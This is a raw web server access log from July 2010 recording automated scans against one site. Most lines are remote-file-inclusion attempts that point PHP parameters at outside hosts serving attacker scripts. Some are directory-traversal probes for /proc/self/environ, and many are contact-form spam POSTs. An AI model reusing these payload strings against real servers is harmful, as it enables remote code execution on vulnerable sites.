203.105.83.126 - - [25/Jul/2010:19:53:30 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:19:53:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:53:42 -0700] "GET /logs/access_091019.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:24 -0700] "GET /logs/access_100301.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:28 -0700] "GET /logs/access_090831.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:38 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:38 -0700] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:38 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 200 7666 "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:40 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:40 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 200 7666 "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:54:40 -0700] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:40 -0700] "GET /logs/access_100222.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:41 -0700] "GET /logs/access_100405.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:48 -0700] "GET /logs/access_100315.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:54:53 -0700] "GET /logs/access_091109.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:06 -0700] "GET /logs/access_100315.log//?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:06 -0700] "GET /logs//?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:06 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:55:14 -0700] "GET /logs/access_091019.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:17 -0700] "GET /logs/access_100503.log//?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:17 -0700] "GET /logs//?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:17 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:19:55:19 -0700] "GET /logs/access_100503.log//?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:55:35 -0700] "GET /logs/access_100201.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:55:35 -0700] "GET /logs/access_100322.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:56:00 -0700] "GET /logs/access_090831.log%20%20/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:19:56:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:19:56:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:19:56:20 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:56:22 -0700] "GET /logs/access_100322.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:56:22 -0700] "GET /logs/access_100201.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.165.217.175 - - [25/Jul/2010:19:56:28 -0700] "GET /logs/access_091005.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.165.217.175 - - [25/Jul/2010:19:56:28 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.165.217.175 - - [25/Jul/2010:19:56:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:57:13 -0700] "GET /logs/access_100531.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:19 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:19 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:20 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:23 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:57:39 -0700] "GET /logs/access_091109.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:44 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
193.43.92.192 - - [25/Jul/2010:19:57:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
195.186.81.84 - - [25/Jul/2010:19:58:13 -0700] "GET /forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.81.84 - - [25/Jul/2010:19:58:13 -0700] "GET /logs/access_100405.log//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.81.84 - - [25/Jul/2010:19:58:14 -0700] "GET /logs//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:19:58:19 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:19:58:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:19:58:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:39 -0700] "GET /logs//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:39 -0700] "GET /logs/access_100405.log//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:39 -0700] "GET /forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:55 -0700] "GET /forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:55 -0700] "GET /logs//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:58:56 -0700] "GET /logs/access_100531.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:19:58:58 -0700] "GET /logs/access_100405.log%20%20//forum/userLogin.php?config[forum_installed]=http://www.saluteinerba.com/data/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:19:59:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:19:59:04 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:19:59:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.23.215.207 - - [25/Jul/2010:19:59:19 -0700] "GET /logs/access_091109.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:19:59:34 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:19:59:35 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:19:59:35 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:19:59:54 -0700] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:19:59:57 -0700] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:00:00 -0700] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:00:13 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:00:13 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:00:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:30 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:30 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:01:38 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs/access_100104.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs/access_100104.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs/access_100104.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:01:55 -0700] "POST /logs/access_100104.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
113.30.66.24 - - [25/Jul/2010:20:02:10 -0700] "GET /logs/access_100125.log//bemarket/postscript/postscript.php?p_mode=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:02:10 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:02:11 -0700] "GET /logs/access_091207.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:02:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:02:17 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:02:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:09 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:09 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:09 -0700] "POST /logs/access_100104.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /logs/access_100104.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /logs/access_100104.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:10 -0700] "POST /logs/access_100104.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:27 -0700] "POST /logs/access_100329.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:27 -0700] "POST /logs/access_100329.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:27 -0700] "POST /logs/access_100329.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:03:27 -0700] "POST /logs/access_100329.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:04:00 -0700] "GET /logs/access_091123.log////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:05:00 -0700] "GET /logs/access_091123.log////?_SERVER[DOCUMENT_ROOT]=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:27 -0700] "POST /logs/access_100315.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /logs/access_100315.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /logs/access_100315.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:05:28 -0700] "POST /logs/access_100315.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:05:32 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:20:05:59 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:20:05:59 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:20:05:59 -0700] "GET /logs/access_091102.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:24 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:26 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:26 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
